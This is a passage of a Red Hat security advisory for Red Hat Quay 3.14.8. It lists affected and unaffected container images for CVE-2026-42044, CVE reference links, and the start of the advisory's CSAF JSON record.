Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-42044

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

References

178 references

URL	Category
https://access.redhat.com/errata/RHSA-2026:21017	self
https://access.redhat.com/security/cve/CVE-2025-61726	external
https://access.redhat.com/security/cve/CVE-2025-62718	external
https://access.redhat.com/security/cve/CVE-2026-2377	external
https://access.redhat.com/security/cve/CVE-2026-25679	external
https://access.redhat.com/security/cve/CVE-2026-27459	external
https://access.redhat.com/security/cve/CVE-2026-29074	external
https://access.redhat.com/security/cve/CVE-2026-32280	external
https://access.redhat.com/security/cve/CVE-2026-32281	external
https://access.redhat.com/security/cve/CVE-2026-32282	external
https://access.redhat.com/security/cve/CVE-2026-32286	external
https://access.redhat.com/security/cve/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-33186	external
https://access.redhat.com/security/cve/CVE-2026-33894	external
https://access.redhat.com/security/cve/CVE-2026-34986	external
https://access.redhat.com/security/cve/CVE-2026-39892	external
https://access.redhat.com/security/cve/CVE-2026-40192	external
https://access.redhat.com/security/cve/CVE-2026-40895	external
https://access.redhat.com/security/cve/CVE-2026-42033	external
https://access.redhat.com/security/cve/CVE-2026-42035	external
https://access.redhat.com/security/cve/CVE-2026-42039	external
https://access.redhat.com/security/cve/CVE-2026-42041	external
https://access.redhat.com/security/cve/CVE-2026-42043	external
https://access.redhat.com/security/cve/CVE-2026-42044	external
https://access.redhat.com/security/cve/CVE-2026-4427	external
https://access.redhat.com/security/updates/classi…	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2025-61726	self
https://bugzilla.redhat.com/show_bug.cgi?id=2434432	external
https://www.cve.org/CVERecord?id=CVE-2025-61726	external
https://nvd.nist.gov/vuln/detail/CVE-2025-61726	external
https://go.dev/cl/736712	external
https://go.dev/issue/77101	external
https://groups.google.com/g/golang-announce/c/Vd2…	external
https://pkg.go.dev/vuln/GO-2026-4341	external
https://access.redhat.com/security/cve/CVE-2025-62718	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456913	external
https://www.cve.org/CVERecord?id=CVE-2025-62718	external
https://nvd.nist.gov/vuln/detail/CVE-2025-62718	external
https://datatracker.ietf.org/doc/html/rfc1034#sec…	external
https://datatracker.ietf.org/doc/html/rfc3986#sec…	external
https://github.com/axios/axios/commit/fb3befb6daa…	external
https://github.com/axios/axios/pull/10661	external
https://github.com/axios/axios/releases/tag/v1.15.0	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-2377	self
https://bugzilla.redhat.com/show_bug.cgi?id=2439201	external
https://www.cve.org/CVERecord?id=CVE-2026-2377	external
https://nvd.nist.gov/vuln/detail/CVE-2026-2377	external
https://access.redhat.com/security/cve/CVE-2026-4427	self
https://www.cve.org/CVERecord?id=CVE-2026-4427	external
https://access.redhat.com/security/cve/CVE-2026-25679	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445356	external
https://www.cve.org/CVERecord?id=CVE-2026-25679	external
https://nvd.nist.gov/vuln/detail/CVE-2026-25679	external
https://go.dev/cl/752180	external
https://go.dev/issue/77578	external
https://groups.google.com/g/golang-announce/c/Edh…	external
https://pkg.go.dev/vuln/GO-2026-4601	external
https://access.redhat.com/security/cve/CVE-2026-27459	self
https://bugzilla.redhat.com/show_bug.cgi?id=2448503	external
https://www.cve.org/CVERecord?id=CVE-2026-27459	external
https://nvd.nist.gov/vuln/detail/CVE-2026-27459	external
https://github.com/pyca/pyopenssl/blob/358cbf29c4…	external
https://github.com/pyca/pyopenssl/commit/57f09bb4…	external
https://github.com/pyca/pyopenssl/security/adviso…	external
https://access.redhat.com/security/cve/CVE-2026-29074	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445132	external
https://www.cve.org/CVERecord?id=CVE-2026-29074	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29074	external
https://github.com/svg/svgo/security/advisories/G…	external
https://access.redhat.com/security/cve/CVE-2026-32280	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456339	external
https://www.cve.org/CVERecord?id=CVE-2026-32280	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32280	external
https://go.dev/cl/758320	external
https://go.dev/issue/78282	external
https://groups.google.com/g/golang-announce/c/0uY…	external
https://pkg.go.dev/vuln/GO-2026-4947	external
https://access.redhat.com/security/cve/CVE-2026-32281	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456333	external
https://www.cve.org/CVERecord?id=CVE-2026-32281	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32281	external
https://go.dev/cl/758061	external
https://go.dev/issue/78281	external
https://pkg.go.dev/vuln/GO-2026-4946	external
https://access.redhat.com/security/cve/CVE-2026-32282	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456336	external
https://www.cve.org/CVERecord?id=CVE-2026-32282	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32282	external
https://go.dev/cl/763761	external
https://go.dev/issue/78293	external
https://pkg.go.dev/vuln/GO-2026-4864	external
https://access.redhat.com/security/cve/CVE-2026-32286	self
https://bugzilla.redhat.com/show_bug.cgi?id=2451847	external
https://www.cve.org/CVERecord?id=CVE-2026-32286	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32286	external
https://github.com/golang/vulndb/issues/4518	external
https://github.com/jackc/pgx/issues/2507	external
https://pkg.go.dev/vuln/GO-2026-4518	external
https://access.redhat.com/security/cve/CVE-2026-32589	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446963	external
https://www.cve.org/CVERecord?id=CVE-2026-32589	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446964	external
https://www.cve.org/CVERecord?id=CVE-2026-32590	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-33186	self
https://bugzilla.redhat.com/show_bug.cgi?id=2449833	external
https://www.cve.org/CVERecord?id=CVE-2026-33186	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33186	external
https://github.com/grpc/grpc-go/security/advisori…	external
https://access.redhat.com/security/cve/CVE-2026-33894	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452464	external
https://www.cve.org/CVERecord?id=CVE-2026-33894	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33894	external
https://datatracker.ietf.org/doc/html/rfc2313#section-8	external
https://github.com/digitalbazaar/forge/security/a…	external
https://mailarchive.ietf.org/arch/msg/openpgp/5rn…	external
https://www.rfc-editor.org/rfc/rfc8017.html	external
https://access.redhat.com/security/cve/CVE-2026-34986	self
https://bugzilla.redhat.com/show_bug.cgi?id=2455470	external
https://www.cve.org/CVERecord?id=CVE-2026-34986	external
https://nvd.nist.gov/vuln/detail/CVE-2026-34986	external
https://github.com/go-jose/go-jose/security/advis…	external
https://pkg.go.dev/github.com/go-jose/go-jose/v4#…	external
https://access.redhat.com/security/cve/CVE-2026-39892	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456735	external
https://www.cve.org/CVERecord?id=CVE-2026-39892	external
https://nvd.nist.gov/vuln/detail/CVE-2026-39892	external
http://www.openwall.com/lists/oss-security/2026/0…	external
https://github.com/pyca/cryptography/commit/622d6…	external
https://github.com/pyca/cryptography/security/adv…	external
https://access.redhat.com/security/cve/CVE-2026-40192	self
https://bugzilla.redhat.com/show_bug.cgi?id=2458856	external
https://www.cve.org/CVERecord?id=CVE-2026-40192	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40192	external
https://github.com/python-pillow/Pillow/commit/3c…	external
https://github.com/python-pillow/Pillow/pull/9521	external
https://github.com/python-pillow/Pillow/security/…	external
https://pillow.readthedocs.io/en/stable/releaseno…	external
https://access.redhat.com/security/cve/CVE-2026-40895	self
https://bugzilla.redhat.com/show_bug.cgi?id=2460297	external
https://www.cve.org/CVERecord?id=CVE-2026-40895	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40895	external
https://github.com/follow-redirects/follow-redire…	external
https://access.redhat.com/security/cve/CVE-2026-42033	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461607	external
https://www.cve.org/CVERecord?id=CVE-2026-42033	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42033	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42035	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461606	external
https://www.cve.org/CVERecord?id=CVE-2026-42035	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42035	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42039	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461630	external
https://www.cve.org/CVERecord?id=CVE-2026-42039	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42039	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42041	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461629	external
https://www.cve.org/CVERecord?id=CVE-2026-42041	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42041	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42043	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461626	external
https://www.cve.org/CVERecord?id=CVE-2026-42043	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42043	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42044	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461624	external
https://www.cve.org/CVERecord?id=CVE-2026-42044	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42044	external
https://github.com/axios/axios/security/advisorie…	external

Acknowledgments

Antony Di Scala Michael Whale

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat Quay 3.14.8 is now available with bug fixes.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Quay 3.14.8",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2026:21017",
        "url": "https://access.redhat.com/errata/RHSA-2026:21017"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
        "url": "https://access.redhat.com/security/cve/CVE-2025-61726"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-62718",
        "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-2377",
        "url": "https://access.redhat.com/security/cve/CVE-2026-2377"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-25679",
        "url": "https://access.redhat.com/security/cve/CVE-2026-25679"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-27459",
        "url": "https://access.redhat.com/security/cve/CVE-2026-27459"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32280",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32281",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32282",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32286",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32286"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32589",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32590",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33186"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33894",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-34986",
        "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-39892",
        "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40895",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42033",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42035",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42039",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42041",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42043",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42044",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4427",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4427"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_21017.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat Quay 3.14.8",
    "tracking": {
      "current_release_date": "2026-06-30T15:49:15+00:00",
      "generator": {
        "date": "2026-06-30T15:49:15+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "5.3.1"
        }
      },
      "id": "RHSA-2026:21017",
      "initial_release_date": "2026-05-26T17:12:40+00:00",
      "revision_history": [
        {
          "date": "2026-05-26T17:12:40+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2026-06-02T17:21:47+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-06-30T15:49:15+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Quay 3.14",
                "product": {
                  "name": "Red Hat Quay 3.14",
                  "product_id": "Red Hat Quay 3.14",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:quay:3.14::el8"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Quay"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-bundle\u0026tag=1778873727"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-bundle\u0026tag=1778874411"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Abc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1778873623"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3Ae76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778874087"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3A052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1778873627"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3Ac82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4?arch=amd64\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1778873589"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-bundle@sha256%3Aa620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-bundle\u0026tag=1779693417"
                  }
                }
              },
              {
                "category": "product_version",
